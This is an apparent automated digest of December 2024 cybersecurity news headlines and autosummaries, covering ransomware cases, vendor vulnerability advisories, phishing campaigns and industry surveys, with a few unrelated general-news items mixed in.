    This article highlights key findings from 2024 reports on AI and GenAI technologies, focusing on their potential and major challenges.
    Overreliance on GenAI to develop software compromises security
    96% of security and software development professionals report that their companies use GenAI-based solutions for building or delivering applications. Among these respondents, 79% report that all or most of their development teams regularly … More

    The post AI is becoming the weapon of choice for cybercriminals appeared first on Help Net Security.


    Autosummary: As today’s risks are increasingly driven by AI and GenAI, the way employees work, and the proliferation of cloud applications, respondents state they need more visibility into source code sent to repositories (88%), files sent to personal cloud accounts (87%), and customer relationship management (CRM) system data downloads (90%). 92% of security pros have security concerns around generative AI, with specific apprehensions including employees entering sensitive company data into an AI tool (48%), using AI systems trained with incorrect or malicious data (44%), and falling for AI-enhanced phishing attempts (42%). Nearly half of respondents describe their risk tolerance towards AI as very high (17%) or high (29%), while only 12% report a low (9%) or very low (3%) AI risk tolerance.


    46% of financial institutions had a data breach in the past 24 months

    financial
    2024-12-20 https://www.helpnetsecurity.com/2024/12/20/financial-industry-data-breaches/

    As the financial industry is the most targeted sector for data breaches in 2024, it’s now more important than ever to strengthen the industry moving into 2025, according to SailPoint.
    Financial institutions face growing cyber threats
    In 2024, roughly 65% of financial organizations worldwide reported experiencing a ransomware attack, compared to 64% in 2023 and 34% in 2021. 46% of financial companies indicated they had a breach in just the last 24 months. 80% … More

    The post 46% of financial institutions had a data breach in the past 24 months appeared first on Help Net Security.


    Autosummary: “In addition to the complexity that mergers and acquisitions introduce to their identity landscape, the influx of machine and third-party identities with access privileges that require protection, and the increased amounts of unmanaged sensitive data have brought to light new areas of risk that, if left ungoverned and unprotected, will result in a growing number of data breaches targeting this sector of the enterprise market.”


    Romanian Netwalker ransomware affiliate sentenced to 20 years in prison

    exploits ransomware
    2024-12-20 https://www.bleepingcomputer.com/news/security/romanian-netwalker-ransomware-affiliate-sentenced-to-20-years-in-prison/
    Daniel Christian Hulea, a Romanian man charged for his involvement in NetWalker ransomware attacks, was sentenced to 20 years in prison after pleading guilty to computer fraud conspiracy and wire fraud conspiracy in June. [...]

    Autosummary: Affiliates of the NetWalker cybercrime gang have deployed this malware in attacks against hundreds of victims worldwide, including hospitals, law enforcement, emergency services, companies, municipalities, school districts, colleges, and universities.


    Why cybersecurity is critical to energy modernization

    industry ciber
    2024-12-20 https://www.helpnetsecurity.com/2024/12/20/anjos-nijk-encs-energy-grid-cybersecurity/

    In this Help Net Security interview, Anjos Nijk, Managing Director of the European Network for Cyber Security (ENCS), discusses cybersecurity in the energy sector as it modernizes with renewable sources and smart grid technologies. Nijk also addresses the need for international collaboration, the impact of IoT on security, and the emerging technologies that can enhance the resilience and reliability of critical energy infrastructure. As the energy sector undergoes significant modernization, particularly with the integration of … More

    The post Why cybersecurity is critical to energy modernization appeared first on Help Net Security.


    Autosummary: So, we need to implement technology to maintain control, but also need to create the conditions for residential users, operators and integrators to securely install, operate and maintain their infrastructure. However, connected infrastructures, such as renewables and EV charging networks, fall outside the direct control of grid operators, and can also cause blackouts in the grid.


    Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools

    exploits
    2024-12-20 https://thehackernews.com/2024/12/hackers-exploiting-critical-fortinet.html
    A now-patched critical security flaw impacting Fortinet FortiClient EMS is being exploited by malicious actors as part of a cyber campaign that installed remote desktop software such as AnyDesk and ScreenConnect. The vulnerability in question is CVE-2023-48788 (CVSS score: 9.3), an SQL injection bug that allows attackers to execute unauthorized code or commands by sending specially crafted



    CISA Adds Critical Flaw in BeyondTrust Software to Exploited Vulnerabilities List

    exploits
    2024-12-20 https://thehackernews.com/2024/12/cisa-adds-critical-flaw-in-beyondtrust.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a critical security flaw impacting BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability, tracked as CVE-2024-12356 (CVSS score: 9.8), is a command injection flaw that



    Ascension: Health data of 5.6 million stolen in ransomware attack

    exploits ransomware
    2024-12-20 https://www.bleepingcomputer.com/news/security/ascension-health-data-of-56-million-stolen-in-ransomware-attack/
    Ascension, one of the largest private U.S. healthcare systems, is notifying over 5.6 million patients and employees that their personal and health data was stolen in a May cyberattack linked to the Black Basta ransomware operation. [...]

    Autosummary: Since the breach, Ascension's investigation has revealed that some of the stolen files contained patients' and employees' names and information across one or more of the following categories (the specific type of exposed information varies from one individual to another): medical information, such as medical record numbers, dates of service, types of lab tests, or procedure codes; payment information encompassing credit card information or bank account numbers; insurance information containing Medicaid/Medicare IDs, policy numbers, or insurance claims; government identification information, including Social Security numbers, tax identification numbers, driver's license numbers, or passport numbers; and other personal information, such as dates of birth or addresses.


    Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware

    exploits
    2024-12-20 https://thehackernews.com/2024/12/lazarus-group-spotted-targeting-nuclear.html
    The Lazarus Group, an infamous threat actor linked to the Democratic People's Republic of Korea (DPRK), has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024. The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are

    Autosummary: Further investigation of the attack chain has revealed that the threat actor moved laterally from Host A to another machine (Host C), where CookieTime was again used to drop various payloads between February and June 2024, such as follows: LPEClient, a malware that comes fitted with capabilities to profile compromised hosts; ServiceChanger, a malware that stops a targeted legitimate service so as to sideload a rogue DLL embedded within it using the executable via DLL side-loading; Charamel Loader, a loader malware that decrypts and loads internal resources like CookieTime, CookiePlus, and ForestTiger; and CookiePlus, a new plugin-based malicious program that's loaded by both ServiceChanger and Charamel Loader. "The difference between each CookiePlus loaded by Charamel Loader and by ServiceChanger is the way it is executed." These activities often involve targeting developers and employees in various companies, including defense, aerospace, cryptocurrency, and other global sectors, with lucrative job opportunities that ultimately lead to the deployment of malware on their machines.


    Rspack npm Packages Compromised with Crypto Mining Malware in Supply Chain Attack

    exploits
    2024-12-20 https://thehackernews.com/2024/12/rspack-npm-packages-compromised-with.html
    The developers of Rspack have revealed that two of their npm packages, @rspack/core and @rspack/cli, were compromised in a software supply chain attack that allowed a malicious actor to publish malicious versions to the official package registry with cryptocurrency mining malware. Following the discovery, versions 1.1.7 of both libraries have been unpublished from the npm registry. The latest

    Autosummary: In an interesting twist, the attack also limits the infection to machines located in a specific set of countries, such as China, Russia, Hong Kong, Belarus, and Iran.


    Sophos Issues Hotfixes for Critical Firewall Flaws: Update to Prevent Exploitation

    exploits
    2024-12-20 https://thehackernews.com/2024/12/sophos-fixes-3-critical-firewall-flaws.html
    Sophos has released hotfixes to address three security flaws in Sophos Firewall products that could be exploited to achieve remote code execution and allow privileged system access under certain conditions. Of the three, two are rated Critical in severity. There is currently no evidence that the shortcomings have been exploited in the wild. The list of vulnerabilities is as follows -

    Autosummary: It has been remediated in the following versions:
    CVE-2024-12727 - v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v20 MR2, v20 MR3, v19.5 MR3, v19.5 MR4, v19.0 MR2)
    CVE-2024-12728 - v20 MR3, v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v19.5 GA, v19.5 MR1, v19.5 MR2, v19.5 MR3, v19.5 MR4, v19.0 MR2, v20 MR2)
    CVE-2024-12729 - v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v20 MR2, v19.5 GA, v19.5 MR1, v19.5 MR2, v19.5 MR3, v19.5 MR4, v19.0 MR2, v19.0 MR3)
    To ensure that the hotfixes have been applied, users are being recommended to follow the below-mentioned steps:
    CVE-2024-12727 - Launch Device Management > Advanced Shell from the Sophos Firewall console, and run the command "cat /conf/nest_hotfix_status" (The hotfix is applied if the value is 320 or above)


    U.S. CISA adds BeyondTrust software flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2024-12-20 https://securityaffairs.com/172170/security/us-cisa-beyondtrust-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Command Injection flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Command Injection flaw, tracked as CVE-2024-12356 (CVSS score of 9.8), to […]



    Swimming mouse among 27 new species discovered in Peru

    latam
    2024-12-20 https://www.bbc.com/news/articles/c3vrnx2gvpko
    The expedition also found a new species of dwarf squirrel and 10 types of butterfly.

    Autosummary: A new species of dwarf squirrel will also belong to a new genus, giving it a higher level of distinction. This dwarf squirrel measures just 14cm (5.5in), half the length of an average grey squirrel in the UK, which ranges from 24 to 29cm, according to the UK Squirrel Accord.


    US charges Russian-Israeli as suspected LockBit ransomware coder

    exploits ransomware rusia-ucrania
    2024-12-20 https://www.bleepingcomputer.com/news/security/us-charges-russian-israeli-as-suspected-lockbit-ransomware-coder/
    The US Department of Justice has charged a Russian-Israeli dual-national for his suspected role in developing malware and managing the infrastructure for the notorious LockBit ransomware group. [...]

    Autosummary: "As alleged in the superseding complaint, at the time of Panev's arrest in Israel in August, law enforcement discovered on Panev's computer administrator credentials for an online repository that was hosted on the dark web and stored source code for multiple versions of the LockBit builder, which allowed LockBit's affiliates to generate custom builds of the LockBit ransomware malware for particular victims," reads the complaint.


    Krispy Kreme breach, data theft claimed by Play ransomware gang

    exploits ransomware
    2024-12-20 https://www.bleepingcomputer.com/news/security/krispy-kreme-breach-data-theft-claimed-by-play-ransomware-gang/
    The Play ransomware gang has claimed responsibility for a cyberattack that impacted the business operations of the U.S. doughnut chain Krispy Kreme in November. [...]

    Autosummary: Krispy Kreme entry on Play Ransomware leak site (BleepingComputer). Play ransomware claims, without proof, that they collected and stole files containing "private and personal confidential data, client documents, budget, payroll, accounting, contracts, taxes, IDs, finance information," and more.


    Google says new scam protection feature in Chrome uses AI

    financial
    2024-12-20 https://www.bleepingcomputer.com/news/google/google-says-new-scam-protection-feature-in-chrome-uses-ai/
    Google is planning to use "AI" in Chrome to detect scams when you browse random web pages. [...]

    Autosummary: For example, if you visit a fake Microsoft tech support page claiming your computer is infected and urging you to call a number, Chrome’s AI could analyze the language, detect the scam tactics like fake urgency or suspicious domains, and display a warning alerting you to avoid interacting with the page or sharing personal information.


    Google Chrome uses AI to analyze pages in new scam detection feature

    financial
    2024-12-20 https://www.bleepingcomputer.com/news/google/google-chrome-uses-ai-to-analyze-pages-in-new-scam-detection-feature/
    Google is using artificial intelligence to power a new Chrome scam protection feature that analyzes brands and the intent of pages as you browse the web. [...]

    Autosummary: Chrome's AI-powered scam detection feature (Source: BleepingComputer). This feature is believed to help the scam detection service detect the brand and purpose (intent) of a webpage, making it easier to identify potential scams.


    Ransomware in 2024: New players, bigger payouts, and smarter tactics

    exploits industry
    2024-12-19 https://www.helpnetsecurity.com/2024/12/19/ransomware-surveys-2024/

    In 2024, ransomware remained the top cybersecurity threat to organizations worldwide. New groups filled the void left by law enforcement crackdowns, targeting businesses with record-breaking ransom demands and sophisticated tactics. In this article, you will find excerpts from ransomware surveys we covered in 2024 that will help your organization improve cybersecurity strategies.
    VPN vulnerabilities, weak credentials fuel ransomware attacks
    Following law enforcement’s takedown of LockBit in Q1, RansomHub, which emerged in February 2024, quickly filled the void, … More

    The post Ransomware in 2024: New players, bigger payouts, and smarter tactics appeared first on Help Net Security.


    Autosummary: During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%. The findings from the report uncovered a record-breaking ransom payment of $75 million to the Dark Angels ransomware group, which is nearly double the highest publicly known ransomware payout, and an overall 18% increase in ransomware attacks year-over-year. As for whether organizations are paying the ransom, respondents were split: 34% pay every time, 21% pay only some of the time, and 45% never pay.


    Leadership skills for managing cybersecurity during digital transformation

    ciber
    2024-12-19 https://www.helpnetsecurity.com/2024/12/19/dan-lohrmann-presidio-digital-transformation-risks/

    In this Help Net Security interview, Dan Lohrmann, CISO at Presidio, discusses the need for organizations to rethink their leadership and operational strategies and the cybersecurity risks they have to deal with during digital transformation.

    The post Leadership skills for managing cybersecurity during digital transformation appeared first on Help Net Security.

    "

    Autosummary: Ensure that repeatable cybersecurity processes are implemented, including updates to areas such as access controls, incident response plans, backup and recovery, vulnerability management, end-to-end change management and other aspects of operational security. This positive change can lead to greater empowerment, as employees gain access to real-time data, AI tools, and automated systems that help them make decisions and improve their productivity. "


    US considers banning TP-Link routers over cybersecurity concerns

    ciber
    2024-12-19 https://securityaffairs.com/172128/uncategorized/us-considers-banning-tp-link-routers.html
    The U.S. government may ban TP-Link routers in 2025 if investigations confirm their use could pose a national security risk. The U.S. government is investigating whether TP-Link routers, linked to cyberattacks, pose a national security risk, the Wall Street Journal reported. According to the WSJ, the U.S. government is considering banning TP-Link routers starting in […] "

    Autosummary: Active since 2021, Storm-0940 gains access through password spraying, brute-force attacks, and exploiting network edge services, targeting sectors like government, law, defense, and NGOs in North America and Europe. The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and previously unknown vulnerabilities. "


    Fortinet Warns of Critical FortiWLM Flaw That Could Lead to Admin Access Exploits

    exploits
    2024-12-19 https://thehackernews.com/2024/12/fortinet-warns-of-critical-fortiwlm.html
    Fortinet has issued an advisory for a now-patched critical security flaw impacting Wireless LAN Manager (FortiWLM) that could lead to disclosure of sensitive information. The vulnerability, tracked as CVE-2023-34990, carries a CVSS score of 9.6 out of a maximum of 10.0. "A relative path traversal [CWE-23] in FortiWLM may allow a remote unauthenticated attacker to read sensitive files," the "

    Autosummary: FortiManager versions 6.4.10 through 6.4.14 (Fixed in 6.4.15 or above) Fortinet also noted that a number of older models, 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, and 3900E, are affected by CVE-2024-48889 provided the "fmg-status" is enabled. "


    UAC-0125 Abuses Cloudflare Workers to Distribute Malware Disguised as Army+ App

    exploits
    2024-12-19 https://thehackernews.com/2024/12/uac-0125-abuses-cloudflare-workers-to.html
    The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed that a threat actor it tracks as UAC-0125 is leveraging Cloudflare Workers service to trick military personnel in the country into downloading malware disguised as Army+, a mobile app that was introduced by the Ministry of Defence back in August 2024 in an effort to make the armed forces go paperless. Users who visit the "

    Autosummary: "


    Android malware found on Amazon Appstore disguised as health app

    exploits
    2024-12-19 https://www.bleepingcomputer.com/news/security/android-spyware-found-on-amazon-appstore-disguised-as-health-app/
    A malicious Android spyware application named "BMI CalculationVsn" was discovered on the Amazon Appstore, masquerading as a simple health tool but stealing data from infected devices in the background. [...] "

    Autosummary: Spyware app on the Amazon Appstore (Source: McAfee). Opening the malicious app welcomes the user to a simple interface that provides the promised functionality, such as calculating their BMI. "


    Fortinet warns of FortiWLM bug giving hackers admin privileges

    exploits
    2024-12-19 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-fortiwlm-bug-giving-hackers-admin-privileges/
    Fortinet has disclosed a critical vulnerability in Fortinet Wireless Manager (FortiWLM) that allows remote attackers to take over devices by executing unauthorized code or commands through specially crafted web requests. [...] "

    Autosummary: According to the security bulletin Fortinet published yesterday, on December 18, 2024, CVE-2023-34990 was fixed in FortiWLM versions 8.6.6 and 8.5.5, released at the end of September 2023. "


    BadBox malware botnet infects 192,000 Android devices despite disruption

    exploits
    2024-12-19 https://www.bleepingcomputer.com/news/security/badbox-malware-botnet-infects-192-000-android-devices-despite-disruption/
    The BadBox Android malware botnet has grown to over 192,000 infected devices worldwide despite a recent sinkhole operation that attempted to disrupt the operation in Germany. [...] "

    Autosummary: The BadBox malware botnet: BadBox is an Android malware thought to be based on the "Triada" malware family, infecting devices made by obscure manufacturers either through supply chain attacks on their firmware, shady employees, or through injections taking place as they enter the product distribution phase. "


    Consumers wrongly attribute all data breaches to cybercriminals

    financial ciber
    2024-12-18 https://www.helpnetsecurity.com/2024/12/18/data-breach-consumers-trust/

    Breaches in 2024 had less impact on consumers’ trust in brands compared to the previous year (a 6.5% decrease from 62% in 2023 to 58% in 2024), according to a recent Vercara report. Most consumers also remain unaware of the role they may play in cyber incidents. Consumers don’t trust companies hit by data breaches: The research reveals that consumers are unaware of the impact of insider threats, and instead assume bad actors are to … More

    The post Consumers wrongly attribute all data breaches to cybercriminals appeared first on Help Net Security.

    "

    Autosummary: Survey respondents believe that the top four causes of breaches are: bad actors hacking into a company’s system – 36% (with 67% of Generation Z holding this belief); a company having extremely poor security measures – 33%; bad actors breaking into physical offices – 8%; insider threats – 5%. While insider threats ranked last on this list, in reality, human error is the cause of most sensitive data loss. "


    Meta Fined €251 Million for 2018 Data Breach Impacting 29 Million Accounts

    financial
    2024-12-18 https://thehackernews.com/2024/12/meta-fined-251-million-for-2018-data.html
    Meta Platforms, the parent company of Facebook, Instagram, WhatsApp, and Threads, has been fined €251 million (around $263 million) for a 2018 data breach that impacted millions of users in the bloc, in what's the latest financial hit the company has taken for flouting stringent privacy laws. The Irish Data Protection Commission (DPC) said the data breach impacted approximately 29 million "

    Autosummary: The fines are pursuant to the violation of four different clauses under the GDPR data privacy laws, namely Article 33(3), Article 33(5), Article 25(1), and Article 25(2): failing to include in its breach notification all the information that it could and should have included; failing to document the facts relating to each breach, the steps taken to remedy them, and to do so in a way that allows the Supervisory Authority to verify compliance; failing to ensure that data protection principles were protected in the design of processing systems; and failing in its obligations as a controller to ensure that only personal data that are necessary for specific purposes are processed. "This enforcement action highlights how the failure to build in data protection requirements throughout the design and development cycle can expose individuals to very serious risks and harms, including a risk to the fundamental rights and freedoms of individuals," DPC Deputy Commissioner Graham Doyle said. "


    Patch Alert: Critical Apache Struts Flaw Found, Exploitation Attempts Detected

    exploits
    2024-12-18 https://thehackernews.com/2024/12/patch-alert-critical-apache-struts-flaw.html
    Threat actors are attempting to exploit a recently disclosed security flaw impacting Apache Struts that could pave the way for remote code execution. The issue, tracked as CVE-2024-53677, carries a CVSS score of 9.5 out of 10.0, indicating critical severity. The vulnerability shares similarities with another critical bug the project maintainers addressed in December 2023 (CVE-2023-50164, CVSS "

    Autosummary: "


    European companies hit with effective DocuSign-themed phishing emails

    financial
    2024-12-18 https://www.helpnetsecurity.com/2024/12/18/european-companies-docusign-themed-phishing-owa-microsoft-azure/

    A threat actor looking to take over the Microsoft Azure cloud infrastructure of European companies has successfully compromised accounts of multiple victims in different firms, according to Palo Alto Networks’ Unit 42 researchers. The phishing campaign: The attack started earlier this year, with phishing emails that were received by roughly 20,000 users in European (including German and UK) companies in the automotive, chemical and industrial compound manufacturing sectors. The campaign peaked in June 2024. The … More

    The post European companies hit with effective DocuSign-themed phishing emails appeared first on Help Net Security.

    "

    Autosummary: "


    BeyondTrust fixes critical vulnerability in remote access, support solutions (CVE-2024-12356)

    exploits
    2024-12-18 https://www.helpnetsecurity.com/2024/12/18/beyondtrust-fixes-critical-vulnerability-in-remote-access-support-solutions-cve-2024-12356/

    BeyondTrust has fixed an unauthenticated command injection vulnerability (CVE-2024-12356) in its Privileged Remote Access (PRA) and Remote Support (RS) products that may allow remote code execution, and is urging organizations with on-premise installations to test the patch and implement it quickly. About CVE-2024-12356: BeyondTrust Privileged Remote Access is an enterprise solution that mediates secure remote access to enterprise environments for employees and trusted vendors. BeyondTrust Remote Support allows organizations’ IT helpdesk personnel to securely connect … More

    The post BeyondTrust fixes critical vulnerability in remote access, support solutions (CVE-2024-12356) appeared first on Help Net Security.

    "

    Autosummary: "


    Not Your Old ActiveState: Introducing our End-to-End OS Platform

    government
    2024-12-18 https://thehackernews.com/2024/12/not-your-old-activestate-introducing.html
    Having been at ActiveState for nearly eight years, I’ve seen many iterations of our product. However, one thing has stayed true over the years: Our commitment to the open source community and companies using open source in their code. ActiveState has been helping enterprises manage open source for over a decade. In the early days, open source was in its infancy. We focused mainly on the "

    Autosummary: A new ActiveState: tackling open source security challenges head-on. Through our work in open source over the past decade, we've discovered there's a gap between the passionate communities producing open source and the enterprises that want to use it in their software. Reimagining the open source management process: At ActiveState, it's our mission to bring rigor to the open source supply chain. Over time, our focus shifted from helping companies run open source to supporting enterprises managing open source when the community wasn't producing it in the way they needed it. The current state of open source and supply chain security: It's inevitable that with the soaring popularity of open source comes an influx of security issues. "


    INTERPOL Pushes for "Romance Baiting" to Replace "Pig Butchering" in Scam Discourse

    financial
    2024-12-18 https://thehackernews.com/2024/12/interpol-pushes-for-romance-baiting-to.html
    INTERPOL is calling for a linguistic shift that aims to put to an end to the term "pig butchering," instead advocating for the use of "romance baiting" to refer to online scams where victims are duped into investing in bogus cryptocurrency schemes under the pretext of a romantic relationship. "The term "pig butchering" dehumanizes and shames victims of such frauds, deterring people from coming "

    Autosummary: "


    Irish Data Protection Commission (DPC) fined Meta €251 million for a 2018 data breach

    financial
    2024-12-18 https://securityaffairs.com/172100/laws-and-regulations/dpc-fined-meta-e251-million.html
    Meta has been fined €251M ($263M) for a 2018 data breach affecting millions in the EU, marking another penalty for violating privacy laws. The Irish Data Protection Commission (DPC) fined Meta €251 million ($263M) for a 2018 data breach impacting 29 million Facebook accounts. “The Irish Data Protection Commission (DPC) has today announced its final […] "

    Autosummary: Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches. The hackers did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said. "


    Pallet liquidation scams and how to recognize them

    financial
    2024-12-18 https://www.malwarebytes.com/blog/news/2024/12/pallet-liquidation-scams-and-how-to-recognize-them
    Pallet liquidation is an attractive playing field for online scammers. Will you receive goods or get your credit card details stolen? "

    Autosummary: In social media groups that specialize in pallet liquidation, you’ll find advertisements that promise valuable merchandise at significantly discounted prices, such as electronics, tools, or other high-demand items. Groups that engage in pallet liquidation sales are rampant on social media and it’s hard to discern the scammers from the legitimate ones (to be honest, I’ve always thought they were all scams, until someone told me there are legitimate ones), let alone the grey area in between. Depending on the reason of sale and the origin, the pallets may include a large quantity of one product or a mix of products, such as overstock or discontinued items, customer returns, or refurbished goods. "


    HubPhish Exploits HubSpot Tools to Target 20,000 European Users for Credential Theft

    exploits
    2024-12-18 https://thehackernews.com/2024/12/hubphish-exploits-hubspot-tools-to.html
    Cybersecurity researchers have disclosed a new phishing campaign that has targeted European companies with an aim to harvest account credentials and take control of the victims' Microsoft Azure cloud infrastructure. The campaign has been codenamed HubPhish by Palo Alto Networks Unit 42 owing to the abuse of HubSpot tools in the attack chain. Targets include at least 20,000 automotive, chemical, "

    Autosummary: Phishing attacks are also increasingly finding novel ways to bypass email security measures, the latest among them being the abuse of legitimate services like Google Calendar and Google Drawings, as well as spoofing email security provider brands, such as Proofpoint, Barracuda Networks, Mimecast, and Virtru. "


    BeyondTrust Issues Urgent Patch for Critical Vulnerability in PRA and RS Products

    exploits
    2024-12-18 https://thehackernews.com/2024/12/beyondtrust-issues-urgent-patch-for.html
    BeyondTrust has disclosed details of a critical security flaw in Privileged Remote Access (PRA) and Remote Support (RS) products that could potentially lead to the execution of arbitrary commands. Privileged Remote Access controls, manages, and audits privileged accounts and credentials, offering zero trust access to on-premises and cloud resources by internal, external, and third-party users. "

    Autosummary: "


    Mexico asks US to hand over "mastermind" in journalist's killing

    latam
    2024-12-18 https://www.bbc.com/news/articles/cwy3pyd7wp0o
    Mexican officials say cartel boss Damaso Lopez Serrano ordered the killing of well-known journalist Javier Valdez in 2017. "

    Autosummary: Mr Gertz added that Mexico has called for his extradition "on countless occasions", but was rebuffed because US authorities considered López Serrano a "protected witness" who "was giving them a lot of information". "


    Critics "continue to try to cancel me" - Vinicius Jr

    industry
    2024-12-18 https://www.bbc.com/sport/football/articles/cwy4e7d7wllo
    Real Madrid forward Vinicius Jr says his critics "continue to try to cancel me, to belittle me" after earning one of football's biggest individual honours. "

    Autosummary: "


    HubSpot phishing targets 20,000 Microsoft Azure accounts

    financial
    2024-12-18 https://www.bleepingcomputer.com/news/security/hubspot-phishing-targets-20-000-microsoft-azure-accounts/
    A phishing campaign targeting automotive, chemical, and industrial manufacturing companies in Germany and the UK is abusing HubSpot to steal Microsoft Azure account credentials. [...] "

    Autosummary: However, the phishing emails associated with this campaign failed Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC) checks. "


    CISA urges switch to Signal-like encrypted messaging apps after telecom hacks

    Telcos
    2024-12-18 https://www.bleepingcomputer.com/news/security/cisa-urges-switch-to-signal-like-encrypted-messaging-apps-after-telecom-hacks/
    Today, CISA urged senior government and political officials to switch to end-to-end encrypted messaging apps like Signal following a wave of telecom breaches across dozens of countries, including eight carriers in the United States. [...] "

    Autosummary: Signal nominated as secure messaging alternative: In today's advisory, CISA recommends switching to an end-to-end encrypted messaging application, naming Signal as an alternative for mobile communication across multiple mobile (iOS, Android) and desktop (macOS, Windows, and Linux) platforms. "


    Ongoing phishing attack abuses Google Calendar to bypass spam filters

    financial
    2024-12-18 https://www.bleepingcomputer.com/news/security/ongoing-phishing-attack-abuses-google-calendar-to-bypass-spam-filters/
    An ongoing phishing scam is abusing Google Calendar invites and Google Drawings pages to steal credentials while bypassing spam filters. [...] "

    Autosummary: "


    Raccoon Stealer malware operator gets 5 years in prison after guilty plea

    exploits
    2024-12-18 https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-operator-gets-5-years-in-prison-after-guilty-plea/
    Ukrainian national Mark Sokolovsky was sentenced today to five years in prison for his involvement in the Raccoon Stealer malware cybercrime operation. [...] "

    Autosummary: "


    Russian hackers use RDP proxies to steal data in MiTM attacks

    rusia-ucrania
    2024-12-18 https://www.bleepingcomputer.com/news/security/russian-hackers-use-rdp-proxies-to-steal-data-in-mitm-attacks/
    The Russian hacking group tracked as APT29 (aka "Midnight Blizzard") is using a network of 193 remote desktop protocol proxy servers to perform man-in-the-middle (MiTM) attacks to steal data and credentials and to install malicious payloads. [...] "

    Autosummary: The domain names registered for the campaign suggest that APT29 targeted entities primarily in the U.S., France, Australia, Ukraine, Portugal, Germany, Israel, Greece, Turkey, and the Netherlands. "


    US considers banning TP-Link routers over cybersecurity risks

    ciber
    2024-12-18 https://www.bleepingcomputer.com/news/security/us-considers-banning-tp-link-routers-over-cybersecurity-risks/
    The U.S. government is considering banning TP-Link routers starting next year if ongoing investigations find that their use in cyberattacks poses a national security risk. [...] "

    Autosummary: In November 2022, the FCC also banned sales of communications equipment made by five other Chinese companies (i.e., Huawei Technologies, ZTE Corporation, Hytera Communications, Hangzhou Hikvision Digital Technology, and Dahua Technology) due to "unacceptable risks to national security." "


    Threat actors are attempting to exploit Apache Struts vulnerability CVE-2024-53677

    exploits
    2024-12-18 https://securityaffairs.com/172109/hacking/apache-struts-vulnerability-cve-2024-53677-flaw.html
    Researchers warn that threat actors are attempting to exploit a recently disclosed Apache Struts vulnerability CVE-2024-53677. Researchers warn that threat actors are attempting to exploit the vulnerability CVE-2024-53677 (CVSS score of 9.5) in Apache Struts. A remote attacker could exploit this vulnerability to upload malicious files, potentially leading to arbitrary code execution. “An attacker can […] "

    Autosummary: "


    Cybersecurity jobs available right now: December 17, 2024

    ciber
    2024-12-17 https://www.helpnetsecurity.com/2024/12/17/cybersecurity-jobs-available-right-now-december-17-2024/

    CISO, ONE Security | Israel | Hybrid: As a CISO, you will be responsible for overseeing information security, cybersecurity, application security, and business continuity strategies. The role involves implementing and managing security measures and collaborating with internal teams to ensure data protection and compliance. Cloud Security Engineer, KUBRA | Canada | Hybrid: As a Cloud Security Engineer, you will perform security assessments of KUBRA systems, applications, and … More

    The post Cybersecurity jobs available right now: December 17, 2024 appeared first on Help Net Security.

    "

    Autosummary: Senior Security Engineer, Offensive Security, VXI Global Solutions | USA | Hybrid: As a Senior Security Engineer, Offensive Security, you will independently manage complete red team exercises, research emerging attack vectors, vulnerabilities and techniques, and develop custom payloads and exploits. Manager | Cyber | Cyber Defense & Resilience, Deloitte | UAE | On-site: As a Manager | Cyber | Cyber Defense & Resilience, you will conduct security assessments, threat modelling, and risk analysis to identify potential security gaps and recommend solutions. Senior Security Architect – Compliance Team, TELUS | Canada | On-site: As a Senior Security Architect – Compliance Team, you will help identify, implement, maintain and update critical security controls to strengthen overall security posture for RFP programs. "


    The Mask APT Resurfaces with Sophisticated Multi-Platform Malware Arsenal

    exploits
    2024-12-17 https://thehackernews.com/2024/12/the-mask-apt-resurfaces-with.html
    A little-known cyber espionage actor known as The Mask has been linked to a new set of attacks targeting an unnamed organization in Latin America twice in 2019 and 2022. "The Mask APT is a legendary threat actor that has been performing highly sophisticated attacks since at least 2007," Kaspersky researchers Georgy Kucherin and Marc Rivero said in an analysis published last week. "Their targets "

    Autosummary: "Careto is capable of inventing extraordinary infection techniques, such as persistence through the MDaemon email server or implant loading though the HitmanPro Alert driver, as well as developing complex multi-component malware," Kaspersky said. "


    CISA and FBI Raise Alerts on Exploited Flaws and Expanding HiatusRAT Campaign

    exploits
    2024-12-17 https://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of flaws is below - CVE-2024-20767 (CVSS score: 7.4) - Adobe ColdFusion contains an improper access control vulnerability that could allow an attacker to access or modify restricted "

